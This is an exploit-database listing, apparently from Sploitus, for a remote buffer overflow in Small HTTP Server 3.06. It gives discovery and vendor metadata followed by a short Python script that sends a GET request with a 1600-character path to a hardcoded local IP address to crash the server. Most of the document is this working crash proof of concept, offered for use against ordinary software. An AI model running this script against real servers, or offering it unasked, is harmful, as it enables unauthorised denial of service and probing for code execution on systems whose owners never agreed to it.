Small HTTP Server 3.06 Remote Buffer Overflow Exploit

Name: Small HTTP Server 3.06 Remote Buffer Overflow Exploit
Rating: 5 (169 reviews)

2022-04-07 | CVSS 7.1

## https://sploitus.com/exploit?id=1337DAY-ID-37596
# Exploit Title: Small HTTP Server Remote Buffer Overflow
# Discovered by: Yehia Elghaly
# Vendor Homepage: http://smallsrv.com/
# Software Link : http://smallsrv.com/shttps_mgi.exe
# Tested Version: 3.06
# Vulnerability Type:  Buffer Overflow Remote
# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 

# Description: Small HTTP Server 3.06 Long GET Remote Buffer Overflow


#!/usr/bin/env python

from requests.exceptions import ConnectionError
from requests.compat import urljoin, quote_plus
import requests as req

try:
  url = "http://192.168.1.99"
  term = "A" * 1600
  evilb = urljoin(url, quote_plus(term))
  resp = req.request(method='GET', url=evilb)
  print(resp.text)
except ConnectionError as e:
  print "Crashed!!"